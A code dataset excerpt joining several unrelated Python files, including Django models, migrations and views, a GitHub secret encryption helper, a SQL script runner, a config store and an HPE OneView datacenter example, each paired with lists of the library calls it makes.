_print('[PYTHON-END] ' + time.ctime(), file=sys.stderr)
check_elapsed_time(start_time)
| [
"subprocess.check_output",
"os.path.exists",
"time.ctime",
"os.path.getsize",
"time.strftime",
"os.path.isfile",
"os.path.isdir",
"subprocess.call",
"sys.exit",
"time.time",
"os.walk",
"os.remove"
] | [((698, 709), 'time.time', 'time.time', ([], {}), '()\n', (707, 709), False, 'import sys, os, os.path, subprocess, time\n'), ((5518, 5541), 'time.strftime', 'time.strftime', (['"""%Y%m%d"""'], {}), "('%Y%m%d')\n", (5531, 5541), False, 'import sys, os, os.path, subprocess, time\n'), ((818, 829), 'time.time', 'time.time', ([], {}), '()\n', (827, 829), False, 'import sys, os, os.path, subprocess, time\n'), ((1343, 1365), 'os.path.isdir', 'os.path.isdir', (['dirname'], {}), '(dirname)\n', (1356, 1365), False, 'import sys, os, os.path, subprocess, time\n'), ((3452, 3463), 'time.time', 'time.time', ([], {}), '()\n', (3461, 3463), False, 'import sys, os, os.path, subprocess, time\n'), ((7203, 7256), 'subprocess.check_output', 'subprocess.check_output', (["['/bin/bash', '-c', command]"], {}), "(['/bin/bash', '-c', command])\n", (7226, 7256), False, 'import sys, os, os.path, subprocess, time\n'), ((737, 749), 'time.ctime', 'time.ctime', ([], {}), '()\n', (747, 749), False, 'import sys, os, os.path, subprocess, time\n'), ((1409, 1425), 'os.walk', 'os.walk', (['dirname'], {}), '(dirname)\n', (1416, 1425), False, 'import sys, os, os.path, subprocess, time\n'), ((2039, 2062), 'os.path.isdir', 'os.path.isdir', (['filename'], {}), '(filename)\n', (2052, 2062), False, 'import sys, os, os.path, subprocess, time\n'), ((3697, 3742), 'subprocess.call', 'subprocess.call', (["['/bin/bash', '-c', command]"], {}), "(['/bin/bash', '-c', command])\n", (3712, 3742), False, 'import sys, os, os.path, subprocess, time\n'), ((11497, 11509), 'time.ctime', 'time.ctime', ([], {}), '()\n', (11507, 11509), False, 'import sys, os, os.path, subprocess, time\n'), ((3222, 3246), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (3236, 3246), False, 'import sys, os, os.path, subprocess, time\n'), ((4424, 4448), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (4438, 4448), False, 'import sys, os, os.path, subprocess, time\n'), ((4878, 4905), 'sys.exit', 
'sys.exit', (['missingFileNumber'], {}), '(missingFileNumber)\n', (4886, 4905), False, 'import sys, os, os.path, subprocess, time\n'), ((2315, 2339), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2329, 2339), False, 'import sys, os, os.path, subprocess, time\n'), ((3311, 3330), 'os.remove', 'os.remove', (['filename'], {}), '(filename)\n', (3320, 3330), False, 'import sys, os, os.path, subprocess, time\n'), ((3888, 3909), 'sys.exit', 'sys.exit', (['returnValue'], {}), '(returnValue)\n', (3896, 3909), False, 'import sys, os, os.path, subprocess, time\n'), ((5049, 5076), 'sys.exit', 'sys.exit', (['missingFileNumber'], {}), '(missingFileNumber)\n', (5057, 5076), False, 'import sys, os, os.path, subprocess, time\n'), ((2344, 2369), 'os.path.getsize', 'os.path.getsize', (['filename'], {}), '(filename)\n', (2359, 2369), False, 'import sys, os, os.path, subprocess, time\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('cms', '0016_auto_20160608_1535'),
('copilot', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EventList',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, primary_key=True, auto_created=True, serialize=False, related_name='copilot_eventlist', to='cms.CMSPlugin')),
('artist_id', models.UUIDField(null=True, verbose_name='artist id', blank=True)),
('event_count', models.PositiveIntegerField(help_text='The maximum number of events to show.', verbose_name='number of events', default=5, validators=[django.core.validators.MinValueValidator(1)])),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AlterField(
model_name='news',
name='cmsplugin_ptr',
field=models.OneToOneField(parent_link=True, primary_key=True, auto_created=True, serialize=False, related_name='copilot_news', to='cms.CMSPlugin'),
),
]
| [
"django.db.models.OneToOneField",
"django.db.models.UUIDField"
] | [((1135, 1280), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'parent_link': '(True)', 'primary_key': '(True)', 'auto_created': '(True)', 'serialize': '(False)', 'related_name': '"""copilot_news"""', 'to': '"""cms.CMSPlugin"""'}), "(parent_link=True, primary_key=True, auto_created=True,\n serialize=False, related_name='copilot_news', to='cms.CMSPlugin')\n", (1155, 1280), False, 'from django.db import migrations, models\n'), ((423, 573), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'parent_link': '(True)', 'primary_key': '(True)', 'auto_created': '(True)', 'serialize': '(False)', 'related_name': '"""copilot_eventlist"""', 'to': '"""cms.CMSPlugin"""'}), "(parent_link=True, primary_key=True, auto_created=True,\n serialize=False, related_name='copilot_eventlist', to='cms.CMSPlugin')\n", (443, 573), False, 'from django.db import migrations, models\n'), ((602, 667), 'django.db.models.UUIDField', 'models.UUIDField', ([], {'null': '(True)', 'verbose_name': '"""artist id"""', 'blank': '(True)'}), "(null=True, verbose_name='artist id', blank=True)\n", (618, 667), False, 'from django.db import migrations, models\n')] |
"""
Full Text Search Framework
"""
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from fts.settings import *
if FTS_BACKEND.startswith('simple://'):
class IndexWord(models.Model):
word = models.CharField(unique=True, db_index=True, blank=False, max_length=100)
def __unicode__(self):
return u"%s" % (self.word)
class Index(models.Model):
word = models.ForeignKey(IndexWord)
weight = models.IntegerField()
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
def __unicode__(self):
return u'%s [%s]' % (self.content_object, self.word.word)
| [
"django.db.models.IntegerField",
"django.contrib.contenttypes.generic.GenericForeignKey",
"django.db.models.ForeignKey",
"django.db.models.PositiveIntegerField",
"django.db.models.CharField"
] | [((299, 372), 'django.db.models.CharField', 'models.CharField', ([], {'unique': '(True)', 'db_index': '(True)', 'blank': '(False)', 'max_length': '(100)'}), '(unique=True, db_index=True, blank=False, max_length=100)\n', (315, 372), False, 'from django.db import models\n'), ((509, 537), 'django.db.models.ForeignKey', 'models.ForeignKey', (['IndexWord'], {}), '(IndexWord)\n', (526, 537), False, 'from django.db import models\n'), ((556, 577), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (575, 577), False, 'from django.db import models\n'), ((612, 642), 'django.db.models.ForeignKey', 'models.ForeignKey', (['ContentType'], {}), '(ContentType)\n', (629, 642), False, 'from django.db import models\n'), ((664, 693), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (691, 693), False, 'from django.db import models\n'), ((720, 774), 'django.contrib.contenttypes.generic.GenericForeignKey', 'generic.GenericForeignKey', (['"""content_type"""', '"""object_id"""'], {}), "('content_type', 'object_id')\n", (745, 774), False, 'from django.contrib.contenttypes import generic\n')] |
# Copyright 2021 METRO Digital GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from base64 import b64encode
from nacl import encoding, public
import argparse
def encrypt(public_key: str, secret_value: str) -> str:
"""Encrypt a string using a given public key"""
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--key', dest="public_key", help="The public key recieved from GitHub API", type=str)
parser.add_argument('--value', dest="secret_value", help="The value to encrypt", type=str)
args = parser.parse_args()
# emcrypt secret value
print(encrypt(args.public_key, args.secret_value))
if __name__ == "__main__":
main() | [
"nacl.public.SealedBox",
"base64.b64encode",
"nacl.encoding.Base64Encoder",
"argparse.ArgumentParser"
] | [((876, 904), 'nacl.public.SealedBox', 'public.SealedBox', (['public_key'], {}), '(public_key)\n', (892, 904), False, 'from nacl import encoding, public\n'), ((1044, 1069), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1067, 1069), False, 'import argparse\n'), ((833, 857), 'nacl.encoding.Base64Encoder', 'encoding.Base64Encoder', ([], {}), '()\n', (855, 857), False, 'from nacl import encoding, public\n'), ((981, 1001), 'base64.b64encode', 'b64encode', (['encrypted'], {}), '(encrypted)\n', (990, 1001), False, 'from base64 import b64encode\n')] |
import datetime
import re
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.shortcuts import redirect
from .core.sqlRunner import *
from .core.SqlRunnerThread import *
from .forms import SqlScriptForm
from .forms import RunForm
from .models import SqlScript
from .models import Run
def homepage(request):
if request.method == "POST":
print(request.FILES)
if request.FILES:
print("Files arrived to the server")
form = SqlScriptForm(request.POST, request.FILES)
if form.is_valid():
print("Valid")
sqlscript = form.save(commit=False)
sqlscript.createdby = request.user
sqlscript.save()
return redirect(scripts)
else:
form = SqlScriptForm()
return render(request, "homepage.html", { "form": form })
def scripts(request):
scripts = SqlScript.objects.all()
context = { "scripts" : scripts }
return render(request, "scripts.html", context)
def runs(request):
run_models = Run.objects.all()
context = { "run_models": run_models }
return render(request, "runs.html", context)
def create_run(request, script_id):
script = SqlScript.objects.get(pk=script_id)
form = RunForm(initial={script:script})
context = { "form" : form, "filename" : script.file.name.split('/')[-1] }
return render(request, "run.html", context)
def run(request, script_id):
script = SqlScript.objects.get(pk=script_id)
if request.method == "POST":
form = RunForm(request.POST)
if form.is_valid():
run_model = form.save(commit=False)
run_model.date = datetime.datetime.now()
run_model.user = request.user
run_model.status = "R"
run_model.script = script
run_model.save()
#trigger the script excecution
run_script(script, run_model)
#redirect to the list of runs
return redirect(runs)
else:
return render(request, "run.html", { "form": form, "filename": script.get_file_name() })
form = RunForm()
return render(request, "run.html", { "form": form, "filename": script.get_file_name() })
def run_script(script, run_model):
def success(context):
if context:
run_id = context["runid"]
rmodel = Run.objects.get(pk=run_id)
rmodel.status = "S"
rmodel.save()
def failed(context):
if context:
run_id = context["runid"]
rmodel = Run.objects.get(pk=run_id)
rmodel.status = "F"
rmodel.save()
sql = script.file.read()
conn_strings = list(map(str.strip, run_model.connstrings.split('\n')))
thread_count = 1
threads = []
for conn_string in conn_strings:
sql_runner = SqlRunner.from_sql_server_connection_string(conn_string)
runner_thread = SqlRunnerThread.from_sqlrunner(sql_runner, sql, "thread-%d" % thread_count,
"thread-%d" % thread_count,thread_count)
threads.append(runner_thread)
runner_thread.success_function = success
runner_thread.failed_function = failed
runner_thread.context = { "runid": run_model.id }
runner_thread.start()
| [
"django.shortcuts.render",
"datetime.datetime.now",
"django.shortcuts.redirect"
] | [((871, 919), 'django.shortcuts.render', 'render', (['request', '"""homepage.html"""', "{'form': form}"], {}), "(request, 'homepage.html', {'form': form})\n", (877, 919), False, 'from django.shortcuts import render\n'), ((1032, 1072), 'django.shortcuts.render', 'render', (['request', '"""scripts.html"""', 'context'], {}), "(request, 'scripts.html', context)\n", (1038, 1072), False, 'from django.shortcuts import render\n'), ((1182, 1219), 'django.shortcuts.render', 'render', (['request', '"""runs.html"""', 'context'], {}), "(request, 'runs.html', context)\n", (1188, 1219), False, 'from django.shortcuts import render\n'), ((1439, 1475), 'django.shortcuts.render', 'render', (['request', '"""run.html"""', 'context'], {}), "(request, 'run.html', context)\n", (1445, 1475), False, 'from django.shortcuts import render\n'), ((801, 818), 'django.shortcuts.redirect', 'redirect', (['scripts'], {}), '(scripts)\n', (809, 818), False, 'from django.shortcuts import redirect\n'), ((1739, 1762), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1760, 1762), False, 'import datetime\n'), ((2053, 2067), 'django.shortcuts.redirect', 'redirect', (['runs'], {}), '(runs)\n', (2061, 2067), False, 'from django.shortcuts import redirect\n')] |
# coding=utf-8
from bluebottle.utils.model_dispatcher import get_donation_model
from bluebottle.utils.serializer_dispatcher import get_serializer_class
from rest_framework import serializers
DONATION_MODEL = get_donation_model()
class ManageDonationSerializer(serializers.ModelSerializer):
project = serializers.SlugRelatedField(slug_field='slug')
fundraiser = serializers.PrimaryKeyRelatedField(required=False)
order = serializers.PrimaryKeyRelatedField()
amount = serializers.DecimalField(max_digits=10, decimal_places=2)
status = serializers.CharField(source='status', read_only=True)
class Meta:
model = DONATION_MODEL
fields = ('id', 'project', 'fundraiser', 'amount', 'status', 'order', 'anonymous', 'completed', 'created')
# FIXME Add validations for amount and project phase
class PreviewDonationSerializer(serializers.ModelSerializer):
project = get_serializer_class('PROJECTS_PROJECT_MODEL', 'preview')
fundraiser = serializers.PrimaryKeyRelatedField(required=False)
user = get_serializer_class('AUTH_USER_MODEL', 'preview')(source='public_user')
class Meta:
model = DONATION_MODEL
fields = ('id', 'project', 'fundraiser', 'user', 'created', 'anonymous', 'amount')
class DefaultDonationSerializer(PreviewDonationSerializer):
class Meta:
model = DONATION_MODEL
fields = PreviewDonationSerializer.Meta.fields + ('amount',)
| [
"bluebottle.utils.serializer_dispatcher.get_serializer_class",
"rest_framework.serializers.PrimaryKeyRelatedField",
"bluebottle.utils.model_dispatcher.get_donation_model",
"rest_framework.serializers.SlugRelatedField",
"rest_framework.serializers.DecimalField",
"rest_framework.serializers.CharField"
] | [((209, 229), 'bluebottle.utils.model_dispatcher.get_donation_model', 'get_donation_model', ([], {}), '()\n', (227, 229), False, 'from bluebottle.utils.model_dispatcher import get_donation_model\n'), ((307, 354), 'rest_framework.serializers.SlugRelatedField', 'serializers.SlugRelatedField', ([], {'slug_field': '"""slug"""'}), "(slug_field='slug')\n", (335, 354), False, 'from rest_framework import serializers\n'), ((372, 422), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {'required': '(False)'}), '(required=False)\n', (406, 422), False, 'from rest_framework import serializers\n'), ((435, 471), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {}), '()\n', (469, 471), False, 'from rest_framework import serializers\n'), ((485, 542), 'rest_framework.serializers.DecimalField', 'serializers.DecimalField', ([], {'max_digits': '(10)', 'decimal_places': '(2)'}), '(max_digits=10, decimal_places=2)\n', (509, 542), False, 'from rest_framework import serializers\n'), ((556, 610), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""status"""', 'read_only': '(True)'}), "(source='status', read_only=True)\n", (577, 610), False, 'from rest_framework import serializers\n'), ((910, 967), 'bluebottle.utils.serializer_dispatcher.get_serializer_class', 'get_serializer_class', (['"""PROJECTS_PROJECT_MODEL"""', '"""preview"""'], {}), "('PROJECTS_PROJECT_MODEL', 'preview')\n", (930, 967), False, 'from bluebottle.utils.serializer_dispatcher import get_serializer_class\n'), ((985, 1035), 'rest_framework.serializers.PrimaryKeyRelatedField', 'serializers.PrimaryKeyRelatedField', ([], {'required': '(False)'}), '(required=False)\n', (1019, 1035), False, 'from rest_framework import serializers\n'), ((1047, 1097), 'bluebottle.utils.serializer_dispatcher.get_serializer_class', 'get_serializer_class', (['"""AUTH_USER_MODEL"""', '"""preview"""'], {}), 
"('AUTH_USER_MODEL', 'preview')\n", (1067, 1097), False, 'from bluebottle.utils.serializer_dispatcher import get_serializer_class\n')] |
import json
import os
from .globals import CLI_GLOBALS
def __maybe_init_config():
if not os.path.exists(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR):
os.mkdir(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)
if not os.path.exists(CLI_GLOBALS.CONFIG):
with open(CLI_GLOBALS.CONFIG, 'w') as config_fp:
json.dump({
"username": "",
"password": "",
"store_password": False
}, config_fp)
def __store_config(field, value):
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
config[field] = value
with open(CLI_GLOBALS.CONFIG, 'w') as config_fp:
json.dump(config, config_fp)
def get_config_value(field):
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
return config.get(field)
def list_config():
__maybe_init_config()
with open(CLI_GLOBALS.CONFIG, 'r') as config_fp:
config = json.load(config_fp)
return config
def put_config_value(field, value):
__store_config(field, value)
def store_username(username):
__store_config('username', username)
def store_password(password):
__store_config('password', password)
def set_store_password(boolean):
__store_config('store_password', boolean)
| [
"json.load",
"os.path.exists",
"os.mkdir",
"json.dump"
] | [((94, 142), 'os.path.exists', 'os.path.exists', (['CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR'], {}), '(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)\n', (108, 142), False, 'import os\n'), ((152, 194), 'os.mkdir', 'os.mkdir', (['CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR'], {}), '(CLI_GLOBALS.ULTRU_CLI_CONFIG_DIR)\n', (160, 194), False, 'import os\n'), ((206, 240), 'os.path.exists', 'os.path.exists', (['CLI_GLOBALS.CONFIG'], {}), '(CLI_GLOBALS.CONFIG)\n', (220, 240), False, 'import os\n'), ((584, 604), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (593, 604), False, 'import json\n'), ((692, 720), 'json.dump', 'json.dump', (['config', 'config_fp'], {}), '(config, config_fp)\n', (701, 720), False, 'import json\n'), ((847, 867), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (856, 867), False, 'import json\n'), ((1013, 1033), 'json.load', 'json.load', (['config_fp'], {}), '(config_fp)\n', (1022, 1033), False, 'import json\n'), ((311, 390), 'json.dump', 'json.dump', (["{'username': '', 'password': '', 'store_password': False}", 'config_fp'], {}), "({'username': '', 'password': '', 'store_password': False}, config_fp)\n", (320, 390), False, 'import json\n')] |
#! /usr/bin/python3
# -*- coding: utf-8 -*-
#
# master_python_read.py
#
# Jul/31/2014
import sys
import json
#
#
sys.path.append ('/var/www/data_base/common/python_common')
from text_manipulate import dict_append_proc
# ---------------------------------------------------------------------
def data_prepare_proc ():
dict_aa = {}
dict_aa = dict_append_proc (dict_aa,'t0421','仙台',41295,'2003-8-12')
dict_aa = dict_append_proc (dict_aa,'t0422','石巻',27936,'2003-5-21')
dict_aa = dict_append_proc (dict_aa,'t0423','塩竈',19825,'2003-4-9')
dict_aa = dict_append_proc (dict_aa,'t0424','気仙沼',39256,'2003-2-25')
dict_aa = dict_append_proc (dict_aa,'t0425','白石',81452,'2003-9-12')
dict_aa = dict_append_proc (dict_aa,'t0426','名取',62397,'2003-7-26')
dict_aa = dict_append_proc (dict_aa,'t0427','多賀城',52984,'2003-10-8')
dict_aa = dict_append_proc (dict_aa,'t0428','岩沼',93612,'2003-2-12')
dict_aa = dict_append_proc (dict_aa,'t0429','大崎',89431,'2003-8-18')
#
return dict_aa
#
# ---------------------------------------------------------------------
dict_aa = data_prepare_proc ()
json_str = json.dumps (dict_aa)
#
print ("Content-type: text/json; charset=UTF-8\n\n")
#
print (json_str)
#
# ---------------------------------------------------------------------
| [
"text_manipulate.dict_append_proc",
"json.dumps",
"sys.path.append"
] | [((117, 175), 'sys.path.append', 'sys.path.append', (['"""/var/www/data_base/common/python_common"""'], {}), "('/var/www/data_base/common/python_common')\n", (132, 175), False, 'import sys\n'), ((1090, 1109), 'json.dumps', 'json.dumps', (['dict_aa'], {}), '(dict_aa)\n', (1100, 1109), False, 'import json\n'), ((345, 405), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0421"""', '"""仙台"""', '(41295)', '"""2003-8-12"""'], {}), "(dict_aa, 't0421', '仙台', 41295, '2003-8-12')\n", (361, 405), False, 'from text_manipulate import dict_append_proc\n'), ((414, 474), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0422"""', '"""石巻"""', '(27936)', '"""2003-5-21"""'], {}), "(dict_aa, 't0422', '石巻', 27936, '2003-5-21')\n", (430, 474), False, 'from text_manipulate import dict_append_proc\n'), ((483, 542), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0423"""', '"""塩竈"""', '(19825)', '"""2003-4-9"""'], {}), "(dict_aa, 't0423', '塩竈', 19825, '2003-4-9')\n", (499, 542), False, 'from text_manipulate import dict_append_proc\n'), ((551, 612), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0424"""', '"""気仙沼"""', '(39256)', '"""2003-2-25"""'], {}), "(dict_aa, 't0424', '気仙沼', 39256, '2003-2-25')\n", (567, 612), False, 'from text_manipulate import dict_append_proc\n'), ((621, 681), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0425"""', '"""白石"""', '(81452)', '"""2003-9-12"""'], {}), "(dict_aa, 't0425', '白石', 81452, '2003-9-12')\n", (637, 681), False, 'from text_manipulate import dict_append_proc\n'), ((690, 750), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0426"""', '"""名取"""', '(62397)', '"""2003-7-26"""'], {}), "(dict_aa, 't0426', '名取', 62397, '2003-7-26')\n", (706, 750), False, 'from text_manipulate import dict_append_proc\n'), ((759, 820), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', 
'"""t0427"""', '"""多賀城"""', '(52984)', '"""2003-10-8"""'], {}), "(dict_aa, 't0427', '多賀城', 52984, '2003-10-8')\n", (775, 820), False, 'from text_manipulate import dict_append_proc\n'), ((829, 889), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0428"""', '"""岩沼"""', '(93612)', '"""2003-2-12"""'], {}), "(dict_aa, 't0428', '岩沼', 93612, '2003-2-12')\n", (845, 889), False, 'from text_manipulate import dict_append_proc\n'), ((898, 958), 'text_manipulate.dict_append_proc', 'dict_append_proc', (['dict_aa', '"""t0429"""', '"""大崎"""', '(89431)', '"""2003-8-18"""'], {}), "(dict_aa, 't0429', '大崎', 89431, '2003-8-18')\n", (914, 958), False, 'from text_manipulate import dict_append_proc\n')] |
# -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from pprint import pprint
from config_loader import try_load_from_file
from hpOneView.oneview_client import OneViewClient
config = {
"ip": "<oneview_ip>",
"credentials": {
"userName": "<username>",
"password": "<password>"
}
}
# Try load config from a file (if there is a config file)
config = try_load_from_file(config)
oneview_client = OneViewClient(config)
datacenter_information = {
"name": "MyDatacenter",
"width": 5000, "depth": 5000
}
# Add a Datacenter
datacenter_added = oneview_client.datacenters.add(datacenter_information)
print("\nAdded Datacenter '{name}' successfully\n".format(**datacenter_added))
# Retrieve Datacenter by URI
datacenter = oneview_client.datacenters.get(datacenter_added['uri'])
print("\nGet Datacenter by URI: retrieved '{name}' successfully\n".format(**datacenter))
# Update the Datacenter
datacenter['name'] = "New Datacenter Name"
datacenter = oneview_client.datacenters.update(datacenter)
print("\nDatacenter '{name}' updated successfully\n".format(**datacenter))
# Get the Datacenter by name
datacenter_list = oneview_client.datacenters.get_by('name', "New Datacenter Name")
print("\nGet Datacenter device by name: '{name}'\n".format(**datacenter))
# Get the Datacenter visual content
print("Getting the Datacenter visual content...")
datacenter_visual_content = oneview_client.datacenters.get_visual_content(datacenter['uri'])
pprint(datacenter_visual_content)
# Remove added Datacenter
oneview_client.datacenters.remove(datacenter)
print("\nSuccessfully removed the datacenter")
# Add a datacenter again and call Remove All
datacenter_added = oneview_client.datacenters.add(datacenter_information)
oneview_client.datacenters.remove_all(filter="name matches '%'")
print("\nSuccessfully removed all datacenters")
| [
"config_loader.try_load_from_file",
"hpOneView.oneview_client.OneViewClient",
"pprint.pprint"
] | [((1485, 1511), 'config_loader.try_load_from_file', 'try_load_from_file', (['config'], {}), '(config)\n', (1503, 1511), False, 'from config_loader import try_load_from_file\n'), ((1530, 1551), 'hpOneView.oneview_client.OneViewClient', 'OneViewClient', (['config'], {}), '(config)\n', (1543, 1551), False, 'from hpOneView.oneview_client import OneViewClient\n'), ((2573, 2606), 'pprint.pprint', 'pprint', (['datacenter_visual_content'], {}), '(datacenter_visual_content)\n', (2579, 2606), False, 'from pprint import pprint\n')] |
from django.conf.urls import url
from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView
urlpatterns = [
url('^people_map_result$', PeopleMapResultView.as_view(), name='people_map_result'),
url('^(?P<username>.+)$', PersonView.as_view(), name='person'),
url('^$', PeopleView.as_view(), name='people'),
] | [
"cms_people.views.people.PeopleMapResultView.as_view",
"cms_people.views.people.PersonView.as_view",
"cms_people.views.people.PeopleView.as_view"
] | [((162, 191), 'cms_people.views.people.PeopleMapResultView.as_view', 'PeopleMapResultView.as_view', ([], {}), '()\n', (189, 191), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n'), ((250, 270), 'cms_people.views.people.PersonView.as_view', 'PersonView.as_view', ([], {}), '()\n', (268, 270), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n'), ((302, 322), 'cms_people.views.people.PeopleView.as_view', 'PeopleView.as_view', ([], {}), '()\n', (320, 322), False, 'from cms_people.views.people import PersonView, PeopleView, PeopleMapResultView\n')] |